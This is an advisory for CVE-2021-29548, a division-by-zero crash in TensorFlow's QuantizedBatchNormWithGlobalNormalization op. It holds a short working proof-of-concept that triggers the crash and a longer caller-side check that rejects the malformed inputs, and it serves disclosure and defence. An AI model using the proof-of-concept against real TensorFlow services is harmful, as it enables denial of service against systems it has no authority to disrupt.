CVE-2021-29548: Division by 0 in `QuantizedBatchNormWithGlobalNormalization`
An attacker can cause a runtime division by zero error and denial of service in `tf.raw_ops.QuantizedBatchNormWithGlobalNormalization`:

```python
import tensorflow as tf

# Empty 4-D input tensor with a collapsed quantization range (min == max)
t = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.quint8)
t_min = tf.constant(-10.0, dtype=tf.float32)
t_max = tf.constant(-10.0, dtype=tf.float32)
# Empty per-channel mean, variance, beta and gamma, each with a collapsed range
m = tf.constant([], shape=[0], dtype=tf.quint8)
m_min = tf.constant(-10.0, dtype=tf.float32)
m_max = tf.constant(-10.0, dtype=tf.float32)
v = tf.constant([], shape=[0], dtype=tf.quint8)
v_min = tf.constant(-10.0, dtype=tf.float32)
v_max = tf.constant(-10.0, dtype=tf.float32)
beta = tf.constant([], shape=[0], dtype=tf.quint8)
beta_min = tf.constant(-10.0, dtype=tf.float32)
beta_max = tf.constant(-10.0, dtype=tf.float32)
gamma = tf.constant([], shape=[0], dtype=tf.quint8)
gamma_min = tf.constant(-10.0, dtype=tf.float32)
gamma_max = tf.constant(-10.0, dtype=tf.float32)
# Calling the raw op with these inputs triggers the division by zero
tf.raw_ops.QuantizedBatchNormWithGlobalNormalization(
    t=t, t_min=t_min, t_max=t_max, m=m, m_min=m_min, m_max=m_max,
    v=v, v_min=v_min, v_max=v_max, beta=beta, beta_min=beta_min,
    beta_max=beta_max, gamma=gamma, gamma_min=gamma_min,
    gamma_max=gamma_max, out_type=tf.qint32,
    variance_epsilon=0.1, scale_after_normalization=True)
```
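The proof of concept above feeds the op two degenerate conditions at once: every tensor is empty, and every quantization range has `min == max`. Until the patched release is deployed, a caller that builds these inputs from untrusted data can enforce the op's contract before the raw op runs. The following is an added example, not TensorFlow's own validation code; it works on plain shapes and ranges so it runs without TensorFlow installed, and the function, error and constant names are assumptions of this example.

```python
# Added example (not TensorFlow code): a caller-side contract check for the inputs
# of tf.raw_ops.QuantizedBatchNormWithGlobalNormalization. Works on shapes and
# (min, max) ranges only, so no TensorFlow import is needed. The helper names and
# the error type are assumptions made for this example.
from typing import Dict, Optional, Sequence, Tuple

Shape = Sequence[int]
Range = Tuple[float, float]


class QuantizedBatchNormContractError(ValueError):
    """Raised when an input would violate the op's documented contract."""


def _check_range(name: str, rng: Range) -> None:
    # A quantized value is decoded as min + q * (max - min) / levels;
    # a collapsed range (min == max) gives a zero scale, so reject it.
    lo, hi = rng
    if not lo < hi:
        raise QuantizedBatchNormContractError(
            f"{name}: quantization range must satisfy min < max, got [{lo}, {hi}]")


def validate_inputs(t_shape: Shape, t_range: Range,
                    m_shape: Shape, m_range: Range,
                    v_shape: Shape, v_range: Range,
                    beta_shape: Shape, beta_range: Range,
                    gamma_shape: Shape, gamma_range: Range) -> int:
    """Return the channel depth when every input satisfies the contract, else raise."""
    if len(t_shape) != 4:
        raise QuantizedBatchNormContractError(
            f"t must be 4-D [batch, height, width, depth], got rank {len(t_shape)}")
    if any(d <= 0 for d in t_shape):
        raise QuantizedBatchNormContractError(
            f"t has a zero-sized dimension in shape {tuple(t_shape)}; nothing to normalise")
    depth = t_shape[3]
    # Per-channel statistics and affine parameters must be 1-D of length depth.
    for name, shape in (("m", m_shape), ("v", v_shape),
                        ("beta", beta_shape), ("gamma", gamma_shape)):
        if len(shape) != 1 or shape[0] != depth:
            raise QuantizedBatchNormContractError(
                f"{name} must have shape [{depth}], got {tuple(shape)}")
    for name, rng in (("t", t_range), ("m", m_range), ("v", v_range),
                      ("beta", beta_range), ("gamma", gamma_range)):
        _check_range(name, rng)
    return depth


def contract_violation(inputs: Dict[str, object]) -> Optional[str]:
    """Return the violation message for a set of inputs, or None if they are acceptable."""
    try:
        validate_inputs(**inputs)  # type: ignore[arg-type]
    except QuantizedBatchNormContractError as exc:
        return str(exc)
    return None


# Constructed from the advisory's proof of concept: empty tensors, collapsed ranges.
POC_INPUTS: Dict[str, object] = {
    "t_shape": (0, 0, 0, 0), "t_range": (-10.0, -10.0),
    "m_shape": (0,), "m_range": (-10.0, -10.0),
    "v_shape": (0,), "v_range": (-10.0, -10.0),
    "beta_shape": (0,), "beta_range": (-10.0, -10.0),
    "gamma_shape": (0,), "gamma_range": (-10.0, -10.0),
}

# Constructed well-formed inputs: one 2x2 image with three channels.
SAFE_INPUTS: Dict[str, object] = {
    "t_shape": (1, 2, 2, 3), "t_range": (0.0, 6.0),
    "m_shape": (3,), "m_range": (-1.0, 1.0),
    "v_shape": (3,), "v_range": (0.0, 2.0),
    "beta_shape": (3,), "beta_range": (-0.5, 0.5),
    "gamma_shape": (3,), "gamma_range": (0.5, 1.5),
}

if __name__ == "__main__":
    print("PoC inputs:", contract_violation(POC_INPUTS))
    print("safe inputs:", contract_violation(SAFE_INPUTS))
```

The check runs before any quantized arithmetic, so a malformed request is rejected with a descriptive error instead of reaching the kernel; in a serving path this is also the point to log the rejection.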
References
- github.com/advisories/GHSA-p45v-v4pw-77jr
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-476.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-674.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-185.yaml
- github.com/tensorflow/tensorflow
- github.com/tensorflow/tensorflow/commit/d6ed5bcfe1dcab9e85a4d39931bd18d99018e75b
- github.com/tensorflow/tensorflow/security/advisories/GHSA-p45v-v4pw-77jr
- nvd.nist.gov/vuln/detail/CVE-2021-29548